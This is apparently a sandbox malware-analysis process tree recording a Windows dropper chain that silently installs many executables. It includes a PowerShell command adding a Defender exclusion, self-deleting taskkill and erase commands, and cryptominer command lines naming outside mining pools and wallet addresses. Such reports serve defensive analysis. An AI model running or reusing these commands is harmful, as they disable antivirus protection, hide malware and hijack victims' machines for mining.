C:\Windows\SysWOW64\taskkill.exetaskkill /im "ckv5eewanrr.exe" /f22⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe" /Verysilent /subid=57720⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T43RE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-T43RE.tmp\Setup3310.tmp" /SL5="$20482,138429,56832,C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OCVBE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OCVBE.tmp\Setup.exe" /Verysilent22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ja0vrfhjbs0\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ja0vrfhjbs0\cpyrix.exe" /VERYSILENT20⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\test.bat"23⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe"C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe" /VERYSILENT /id=53520⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2SR2D.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2SR2D.tmp\vict.tmp" /SL5="$3047E,870426,780800,C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CCDF7.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CCDF7.tmp\win1host.exe" 53522⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0tzvyzca4gj\app.exe"C:\Users\Admin\AppData\Local\Temp\0tzvyzca4gj\app.exe" /8-2320⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe"C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B0PR2.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-B0PR2.tmp\setups.tmp" /SL5="$40304,454998,229376,C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe" ll18⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a3-49a69-8fa-e07bc-a797644b648d1\Cyshagebacu.exe"C:\Users\Admin\AppData\Local\Temp\a3-49a69-8fa-e07bc-a797644b648d1\Cyshagebacu.exe"14⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 203215⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7CU36.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CU36.tmp\lylal220.tmp" /SL5="$203AA,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-6A0JG.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-6A0JG.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe"C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MIC38.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-MIC38.tmp\irecord.tmp" /SL5="$60370,6265333,408064,C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\c8-93eec-c15-63f97-b9f78dbe5336d\Jaelashagify.exe"C:\Users\Admin\AppData\Local\Temp\c8-93eec-c15-63f97-b9f78dbe5336d\Jaelashagify.exe"14⤵
- Modifies Internet Explorer settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2houqqwb.dor\toolspab1.exe & exit15⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2tjb3lt.jhz\GcleanerWW.exe /mixone & exit15⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exeC:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 1 3.1617537653.6069aa75aac33 10119⤵
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 2 3.1617537653.6069aa75aac3320⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe"C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LVI8S.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-LVI8S.tmp\vict.tmp" /SL5="$806A4,870426,780800,C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OEL24.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OEL24.tmp\win1host.exe" 53523⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zml5w0kfqui\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\zml5w0kfqui\cpyrix.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\test.bat"24⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30ar5isekej\app.exe"C:\Users\Admin\AppData\Local\Temp\30ar5isekej\app.exe" /8-2321⤵
-
-
C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe"C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe" /ustwo INSTALL21⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ulc10ehtdu0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe" & exit22⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ulc10ehtdu0.exe" /f23⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KFN74.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KFN74.tmp\Setup3310.tmp" /SL5="$5069E,138429,56832,C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe" /Verysilent /subid=57722⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UTBQA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UTBQA.tmp\Setup.exe" /Verysilent23⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe" ll18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4D5QB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4D5QB.tmp\setups.tmp" /SL5="$B0446,454998,229376,C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe" ll19⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"17⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"17⤵
- Drops file in Program Files directory
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵
- Modifies registry class
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"17⤵
-
C:\Users\Admin\AppData\Roaming\BDB5.tmp.exe"C:\Users\Admin\AppData\Roaming\BDB5.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
-
-
-
C:\Users\Admin\AppData\Roaming\CA39.tmp.exe"C:\Users\Admin\AppData\Roaming\CA39.tmp.exe"18⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"18⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exeC:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe /8-222216⤵
-
C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe"C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe" /8-222217⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exeC:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 1 3.1617537752.6069aad86c952 10418⤵
-
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 2 3.1617537752.6069aad86c95219⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe" /Verysilent /subid=57720⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1TC8U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-1TC8U.tmp\Setup3310.tmp" /SL5="$20702,138429,56832,C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G0MT3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G0MT3.tmp\Setup.exe" /Verysilent22⤵
- Drops file in Program Files directory
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iiw0nwakcfz\app.exe"C:\Users\Admin\AppData\Local\Temp\iiw0nwakcfz\app.exe" /8-2320⤵
-
-
C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe"C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe" /ustwo INSTALL20⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4pk4ooaomy2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe" & exit21⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vj2dgfxca4s\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vj2dgfxca4s\cpyrix.exe" /VERYSILENT20⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe"C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe" /VERYSILENT /id=53520⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U3KHB.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-U3KHB.tmp\vict.tmp" /SL5="$6078A,870426,780800,C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SNRB1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-SNRB1.tmp\win1host.exe" 53522⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe"C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-80COC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-80COC.tmp\setups.tmp" /SL5="$208CC,454998,229376,C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe" ll18⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\66-b47f9-7b4-970af-f82ec842ed060\Naedyruwode.exe"C:\Users\Admin\AppData\Local\Temp\66-b47f9-7b4-970af-f82ec842ed060\Naedyruwode.exe"14⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 210815⤵
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 1 3.1617537482.6069a9ca24640 10313⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 2 3.1617537482.6069a9ca2464014⤵
- Checks computer location settings
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\vgnqr3iw0rd\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vgnqr3iw0rd\cpyrix.exe" /VERYSILENT15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe" /SpecialRun 4101d8 758018⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 156817⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe"C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe" /ustwo INSTALL15⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dkhayr1zoav.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe" & exit16⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dkhayr1zoav.exe" /f17⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe"C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe" /8-2315⤵
-
C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe"C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe" /8-2316⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe" /silent /subid=48215⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-DUN46.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-DUN46.tmp\vpn.tmp" /SL5="$70054,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe" /silent /subid=48216⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe" /Verysilent /subid=57715⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-OGRBJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-OGRBJ.tmp\Setup3310.tmp" /SL5="$60386,138429,56832,C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-I4DA6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-I4DA6.tmp\Setup.exe" /Verysilent17⤵
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe"C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe" /VERYSILENT /id=53515⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-V9NQI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9NQI.tmp\vict.tmp" /SL5="$20306,870426,780800,C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe" /VERYSILENT /id=53516⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KOB06.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-KOB06.tmp\win1host.exe" 53517⤵
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe"C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe" ll12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-N2B4L.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-N2B4L.tmp\setups.tmp" /SL5="$2036A,454998,229376,C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe" ll13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
-
